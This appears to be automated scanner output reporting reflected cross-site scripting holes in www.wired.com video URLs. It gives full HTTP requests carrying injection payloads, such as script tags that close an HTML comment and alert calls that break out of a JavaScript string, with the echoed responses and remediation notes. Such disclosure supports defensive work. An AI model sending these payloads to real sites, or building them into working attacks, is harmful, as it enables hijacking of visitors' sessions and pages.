<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /video290c1--><script>alert(1)</script>bf3897741a4/latest-videos/latest/1815816633/a-walle-for-roadside-bombs/660653911001 --> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7799c"><a>3f7467ea934 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos7799c"><a>3f7467ea934/latest/1815816633/a-walle-for-roadside-bombs/660653911001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=280 Expires: Mon, 22 Nov 2010 00:44:25 GMT Date: Mon, 22 Nov 2010 00:39:45 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106767
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos7799c"><a>3f7467ea934 c_latest"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff824"-alert(1)-"f06fa475ad8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videosff824"-alert(1)-"f06fa475ad8/latest/1815816633/a-walle-for-roadside-bombs/660653911001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=285 Expires: Mon, 22 Nov 2010 00:46:10 GMT Date: Mon, 22 Nov 2010 00:41:25 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106710
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 533c5"-alert(1)-"4bb8706c87e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest533c5"-alert(1)-"4bb8706c87e/1815816633/a-walle-for-roadside-bombs/660653911001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=299 Expires: Mon, 22 Nov 2010 00:47:22 GMT Date: Mon, 22 Nov 2010 00:42:23 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106781
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee85a"><a>e2676fa6cb5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos/latestee85a"><a>e2676fa6cb5/1815816633/a-walle-for-roadside-bombs/660653911001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=291 Expires: Mon, 22 Nov 2010 00:46:25 GMT Date: Mon, 22 Nov 2010 00:41:34 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106767
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos c_latestee85a"><a>e2676fa6cb5"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 528de"-alert(1)-"2cc92763f9f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633528de"-alert(1)-"2cc92763f9f/a-walle-for-roadside-bombs/660653911001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:47:46 GMT Date: Mon, 22 Nov 2010 00:42:46 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106773
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cfc05"-alert(1)-"808e58c0512 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/a-walle-for-roadside-bombscfc05"-alert(1)-"808e58c0512/660653911001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=285 Expires: Mon, 22 Nov 2010 00:47:45 GMT Date: Mon, 22 Nov 2010 00:43:00 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106682
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94a45"-alert(1)-"0b8e91ffbd8 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/a-walle-for-roadside-bombs/66065391100194a45"-alert(1)-"0b8e91ffbd8 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=272 Expires: Mon, 22 Nov 2010 00:47:51 GMT Date: Mon, 22 Nov 2010 00:43:19 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106746
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1feae"><a>906cb8c65f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video1feae"><a>906cb8c65f/latest-videos/latest/1815816633/back-to-the-future-physics-the-river-of-time/653293411001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29437 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:45:40 GMT Date: Mon, 22 Nov 2010 00:40:40 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video1feae"><a>906cb8c65f ss_latest-videos c_latest"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 71840--><script>alert(1)</script>ad628cf891f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /video71840--><script>alert(1)</script>ad628cf891f/latest-videos/latest/1815816633/back-to-the-future-physics-the-river-of-time/653293411001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29478 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:46:56 GMT Date: Mon, 22 Nov 2010 00:41:56 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /video71840--><script>alert(1)</script>ad628cf891f/latest-videos/latest/1815816633/back-to-the-future-physics-the-river-of-time/653293411001 --> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67bfd"><a>253750acaf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos67bfd"><a>253750acaf/latest/1815816633/back-to-the-future-physics-the-river-of-time/653293411001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:46:57 GMT Date: Mon, 22 Nov 2010 00:41:57 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106758
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos67bfd"><a>253750acaf c_latest"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55513"-alert(1)-"bef2343d7bd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos55513"-alert(1)-"bef2343d7bd/latest/1815816633/back-to-the-future-physics-the-river-of-time/653293411001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:47:43 GMT Date: Mon, 22 Nov 2010 00:42:43 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106799
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 603f0"><a>2b228d8fd46 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos/latest603f0"><a>2b228d8fd46/1815816633/back-to-the-future-physics-the-river-of-time/653293411001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=279 Expires: Mon, 22 Nov 2010 00:47:35 GMT Date: Mon, 22 Nov 2010 00:42:56 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106778
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos c_latest603f0"><a>2b228d8fd46"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b9e0"-alert(1)-"7ee84ee8e21 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest8b9e0"-alert(1)-"7ee84ee8e21/1815816633/back-to-the-future-physics-the-river-of-time/653293411001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=275 Expires: Mon, 22 Nov 2010 00:48:43 GMT Date: Mon, 22 Nov 2010 00:44:08 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106774
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... ipt type="text/javascript">
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 96572"-alert(1)-"8ce4e8daf48 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/181581663396572"-alert(1)-"8ce4e8daf48/back-to-the-future-physics-the-river-of-time/653293411001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=283 Expires: Mon, 22 Nov 2010 00:49:25 GMT Date: Mon, 22 Nov 2010 00:44:42 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106746
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd377"-alert(1)-"b5566d1a53d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/back-to-the-future-physics-the-river-of-timefd377"-alert(1)-"b5566d1a53d/653293411001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:49:58 GMT Date: Mon, 22 Nov 2010 00:44:58 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106791
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... ipt type="text/javascript">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5349f"-alert(1)-"5db7cf1b00 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/back-to-the-future-physics-the-river-of-time/6532934110015349f"-alert(1)-"5db7cf1b00 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=286 Expires: Mon, 22 Nov 2010 00:50:03 GMT Date: Mon, 22 Nov 2010 00:45:17 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106760
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 99d40--><script>alert(1)</script>9411b968572 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /video99d40--><script>alert(1)</script>9411b968572/latest-videos/latest/1815816633/battle-los-angeles-trailer/676257685001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29460 Vary: Accept-Encoding Cache-Control: max-age=277 Expires: Mon, 22 Nov 2010 00:40:36 GMT Date: Mon, 22 Nov 2010 00:35:59 GMT Connection: close
